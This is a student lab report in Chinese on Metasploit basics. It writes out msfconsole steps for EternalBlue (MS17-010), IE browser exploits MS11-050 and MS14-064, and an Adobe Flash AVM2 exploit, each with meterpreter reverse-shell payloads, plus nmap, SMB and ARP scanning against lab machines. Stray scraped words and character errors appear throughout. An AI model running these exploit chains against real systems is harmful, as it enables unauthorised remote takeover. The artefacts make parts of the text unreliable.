2018-2019-2 20165313 《網絡對抗技術》 Exp5:MSF基礎應用

實踐使用漏洞和輔助模塊

任務一:MS17-010安全漏洞

任務二:(1)MS11-050(失敗)(2)MS14-064(惟一)

任務三:abode_flash_avm2

輔助模塊:(1)ARP掃描模塊(惟一)(2)auxiliary/scanner/smb/smb_ms17_010 (掃描靶機是否會被此漏洞攻擊)(3)nmap掃描靶機開放端口(惟一)

實踐要求與問題回答

1. 實踐內容(3.5分)

本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:
1.1一個主動攻擊實踐,如ms08_067; (1分)
1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)
1.3 一個針對客戶端的攻擊,如Adobe;(1分)
1.4 成功應用任何一個輔助模塊。(0.5分)
以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分html

問題回答

用本身的話解釋什麼是 exploit , payload , encode.

exploit: 設至關於利用漏洞打開的通道,將作好的木馬病毒等順利傳輸到靶機。
payload: 簡單來講就是病毒代碼包裝成一個可執行的文件(任意指定類型),而後經過通道傳輸爲獲取靶機權限作準備。
encode: 針對payload進行編碼,改變payload代碼特徵(例如不出現「0x00」的特殊機器碼等),可是不改變payload爲咱們所用的特徵,能對payload進行加工。shell

實踐過程

本次實踐所用的輔助功能及漏洞:nmap掃描,auxiliary輔助模塊,MS17-010安全漏洞,MS11-050/MS14-064,abode_flash_avm2

1、Windows服務滲透攻擊——MS17-010安全漏洞

(1)打開MSF輸入nmap -O -Pn 192.168.239.129

(2)利用auxiliary輔助模塊進行掃描:

msf > use auxiliary/scanner/smb/smb_ms17_010       
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.239.129    
msf auxiliary(scanner/smb/smb_ms17_010) > run

(3)根據要求設置並攻擊:

輸入back退回,而後依次輸入:windows

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp 
set LHOST 192.168.239.131
set RHOST 192.168.239.129
exploit

2、瀏覽器滲透攻擊——MS11-050/MS14-064

(1)

打開MSF,依次輸入:瀏覽器

use windows/browser/ms11_050_mshtml_cobjectelement
set payloadwindows/meterpreter/reverse_http
set LHOST 192.168.239.131
set LPORT 5313
exploit


在靶機上打開生成的URL,發現報錯,猜想多是漏洞和IE版本問題
安全

(2)從新選擇:

主要步驟和(1)中大體相同,就是修改一下調用的名稱。注意:須要添加的指令AllowPowershellprompt---true並將http連接改爲tcp連接
網絡

生成URL並開啓監聽服務:
session

靶機打開IE瀏覽器,輸入網址:
tcp

攻擊機回連成功,輸入sessions -i獲取對話:
編碼

3、針對Adobe Reader軟件的滲透攻擊——abode_flash_avm2

(1)生成PDF文件沒有成功(上一屆學長學姐的經驗並很差用)

(2)利用abode_flash_avm2攻擊:

(1)輸入search abode
spa

(2)根據要求進行配置:

use exploit/windows/browser/abode_flash_avm2
set srvhost 192.168.239.131
set lhost 192.168.239.131
set payloadwindows/meterpreter/reverse_tcp

(3)在靶機裏下載adobe_flash_11。

(4)輸入exploit:

(5)在靶機裏登陸生成出來的地址:

(6)獲取權限:

4、輔助模塊——ARP掃描模塊

網絡安全協議中曾經講到過ARP欺騙,因而我便嘗試了ARP掃描

(1)seach尋找模塊:

(2)根據要求配置:
第一次掃描的是一個網段(設置及結果以下):

第二次掃描靶機:

實踐總結及體會

本次試驗在我看來爲漏洞尋找合適的靶機是一件很費時間的事情,須要足夠的耐心,第二就是如何正確利用MSF的輔助功能爲攻擊作好鋪墊,仍然須要大量反覆的實踐,否則所掌握的東西僅僅知識一點點皮毛而已。同時我發現想要利用一個漏洞進行攻擊也不是一件容易的事情,由於一個漏洞不可能對全部狀況都適用,因此攻擊方不只僅是要找合適的漏洞,也要爲漏洞找合適的機器或程序。矛和盾的較量看來還要持續好久好久。

相關文章
相關標籤/搜索